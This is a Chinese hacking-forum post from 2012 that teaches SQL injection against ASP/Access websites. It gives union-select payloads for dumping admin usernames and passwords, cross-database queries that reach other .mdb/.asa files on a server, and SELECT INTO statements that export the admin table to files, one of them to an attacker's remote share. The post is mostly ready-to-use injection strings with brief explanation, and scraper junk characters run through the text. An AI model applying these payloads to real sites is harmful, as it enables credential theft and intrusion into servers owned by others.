--------------------------------------------------------------* U1 H2 w- Z. r& g' Q
union查询法
. I, p$ M- `3 s& P0 Y首先要说的就是查询办法,一般的查询办法就是
" G6 b( ?* b: l
# m4 F- e8 {2 v; E6 @; ]程序代码
: C, B9 u9 G' h" e) E5 ?% k0 d8 Rand 1=(select count(*) from admin where left(id,1)='1'): s+ m, \$ n+ B: H8 @- g$ `
( ?: ?6 _; y+ M" V: Y
这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.
) z% z( V3 M6 F' o所以这个时候,union select横空出现.别以为只能在PHP里用哦...6 D$ W) a3 u, c( C0 Z) V" Y
譬如你有一个ACCESS点:9 o: M2 \4 G% l" H' d- O
程序代码: R6 c# g9 f: k1 ^. k. |
http://bbs.tian6.com/xiaoyang.asp?coder=1
% O* r- ]; h6 _3 R
6 a' E9 \3 u0 [: M, E9 j知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),4 n" o% P7 |: y
然后我们直接来:
0 X$ G( H* c- k. j) @ e# w5 K程序代码" T& _9 x9 v, W
http://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]
$ K! {4 O- l6 y2 c3 L
* a0 Y1 u+ c& {! L0 U这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.
% X2 R' C5 |/ h" q0 b1 _
5 e4 n+ w( V4 v' v9 Q
( b3 f+ i0 A! A9 o) D; m' W2 O+ T/ A
---------------------------------------------------------------
& z( H) [3 b; }# @; A( XAccess跨库查询2 G( @ {# B( z4 W* X' U% o4 n
有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.+ S+ \. i2 g. ^6 D( R5 r
跨库的查询语句:% z( p( P& N) d
子查询:
( e4 b5 |4 E: c程序代码
! v) s% S; h1 c2 L5 p7 ^5 |( B) Gand (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0* }/ D* G* t) j3 O
4 y! O' h8 X0 g/ [. _
union查询:
3 D+ [( Z! U/ n- O程序代码$ ]/ l3 a) j7 y! p. p5 w/ j# n
union select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=1
+ u# m. B+ }3 U* A$ b6 g7 P9 m; o- I, W5 B3 p" t; a
跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:1 K" L; |/ E% h/ S: @
程序代码
2 }) J0 C+ B4 I/ n# dhttp://www.4ngel.net/article/46.htm 2 `: M" G! K3 w! [) {% u* Z) K
http://hf110.com/Article/hack/rqsl/200502/66.html" D3 k$ O+ t b8 L
7 Z) ^$ ^' u5 G4 I; \/ @
---------------------------------------------------------------; g9 x6 Y) k& d: s( s5 |
Access注入,导出txt,htm,html' a0 M' E3 B/ {7 |- {# d9 y% X
子查询语句:8 N! \" y; C( A9 `1 F
程序代码
# v1 w+ W8 E8 HSelect * into [test.txt] in 'd:\web\' 'text;' from admin
5 I9 r j6 ?1 H# ~7 i. i* @4 }; |0 A5 }5 K% J. g# s0 f; t1 G
这样就把admin表的内容以test类型存进了d:\web里面.7 z" S* z9 L8 ]. O7 m1 R. v. c
UNION查询:
5 j9 {! B# s+ P8 A( S% c( v程序代码- A n% u' C0 Y8 \% H% m
union select * into [admin.txt] in 'c:\' 'test;' from admin
/ N, r3 \1 P% ~2 ?; X z* U; Y6 T6 F3 U, j' ]# x4 N- T. e
而且这里也可以保存到本地来:8 Y8 q2 g% l P1 k' }
程序代码
9 z Y3 z- H7 H {& U8 jSelect * into [test.txt] in '\\yourip\share' 'text;' from admin9 l5 @0 P- @# x1 s. e# d2 ?* V% H
2 J% X( L/ S/ u/ Z# E& Y1 I1 W3 Q1 T8 q
不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:7 ]' a) `& G" t
3 C% j4 Q9 ? `程序代码( b) S2 C) z h9 y" U6 j+ F
http://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D70 t- a; b: ? V! ^! w5 K' z
( H3 j8 y1 [3 k, \( Z" H
因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang asp.asp之类的文件或者目录来导进文件~还是会很强大的.
0 S+ H! |8 u4 r5 u8 T) k$ |6 |1 D3 t |
发表于 2012-9-15 14:20:57
收藏
支持
反对